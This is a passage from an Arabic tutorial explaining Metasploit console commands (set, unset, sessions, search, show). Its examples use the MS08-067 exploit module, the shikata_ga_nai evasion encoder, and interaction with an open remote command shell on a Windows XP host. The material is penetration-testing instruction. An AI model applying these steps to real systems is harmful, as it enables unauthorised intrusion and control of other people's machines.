x86/jmp_call_additive normal Jump/Call XOR Additive Feedback Encoder
x86/nonalpha low Non-Alpha Encoder
x86/nonupper low Non-Upper Encoder
x86/shikata_ga_nai excellent Polymorphic XOR Additive Feedback Encoder
x86/single_static_bit manual Single Static Bit
x86/unicode_mixed manual Alpha2 Alphanumeric Unicode Mixedcase Encoder
x86/unicode_upper manual Alpha2 Alphanumeric Unicode Uppercase Encoder
msf exploit(ms08_067_netapi) > set encoder x86/shikata_ga_nai
encoder => x86/shikata_ga_nai



أمر (unset) :
وهذا الامر هو عكس امر ‘set’.ويقوم بأزإلة المتغيرات التي قادم بضبطها وإضافتها أمر ‘set’، ويمكنك إزالة جميع المتغيرات مره واحده بأمر ‘unset all’.
msf > set RHOSTS 192.168.1.0/24
RHOSTS => 192.168.1.0/24
msf > set THREADS 50
THREADS => 50
msf > set
Global
======
Name Value
---- -----
RHOSTS 192.168.1.0/24
THREADS 50
msf > unset THREADS
Unsetting THREADS...
msf > unset all
Flushing datastore...
msf > set Global
======
No entries in data store.



أمر (sessions) :
هذا الامر يقوم بعرض و التفاعل او انهئ او تنقل بين الجلسات التي تكون فعالة وهذه الجلسات تكون عبارة عن شل(shell)، ميتربريتر(Meterpreter sessions) او VNC … الخ.

msf > sessions -h
Usage: sessions [options]
Active session manipulation and interaction.

OPTIONS:

-K Terminate all sessions
-c Run a command on the session given with -i, or all
--d Detach an interactive session
-h Help banner
-i Interact with the supplied session ID
--k Terminate session
--l List all active sessions
-q Quiet mode
-r Reset the ring buffer for the session given with -i, or all
-s Run a script on the session given with -i, or all
-u Upgrade a win32 shell to a meterpreter session
-v List verbose fields

ولكي تقوم بعرض الجلسات(sessions) النشطة، مرر حرف ‘-l’ الى امر ‘sessions’.
msf exploit(ms08_067_netapi) > sessions -l
Active sessions
===============
Id Description Tunnel
-- ----------- ------
1 Command shell 192.168.1.20:33191 ->; 192.168.1.22:4444

عندما تريد التعامل مع أحد الجلسات النشطة، فعليك تمرير المتغير ‘-i’ متبوع برقم الجلسة ‘session id’ لاحظ المثال التالي:
msf exploit(ms08_067_netapi) > sessions -i 1
[*] Starting interaction with 1...

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32



أمر (search) :
يقوم هذا الامر ببحث شامل داخل الموديلز(modules) وبادخال جز من اسم الموديل او الاسم كامل فيقوم بعرض بيانات الموديل من الاسم، وصف عن الموديل … الخ.
msf > search ms08_067_netapi
[*] Searching loaded modules for pattern 'ms08_067_netapi'...

Exploits
========

Name Disclosure Date Rank Description
---- --------------- ---- -----------
windows/smb/ms08_067_netapi 2008-10-28 great Microsoft Server Service Relative Path Stack Corruption



أمر (show) :


بأدخال أمر ‘show’ في ‘msfconsole’ سوف يعرض لك كافة الموديلز ‘modules’ داخل MSF .

msf > show

encoders
========
Name Disclosure Date Rank Description
---- --------------- ---- -----------
cmd/generic_sh good Generic Shell Variable Substitution Command Encoder
cmd/ifs low Generic ${IFS} Substitution Command Encoder
cmd/printf_php_mq good printf(1) via PHP magic_quotes Utility Command Encoder
generic/none normal The "none" Encoder
mipsbe/longxor normal XOR Encoder
mipsle/longxor normal XOR Encoder

...ألخ..

وأيضاً بمكانك عرض كل موديلز على حدة مثل ‘show auxiliary’، ‘show exploits’، ‘show payloa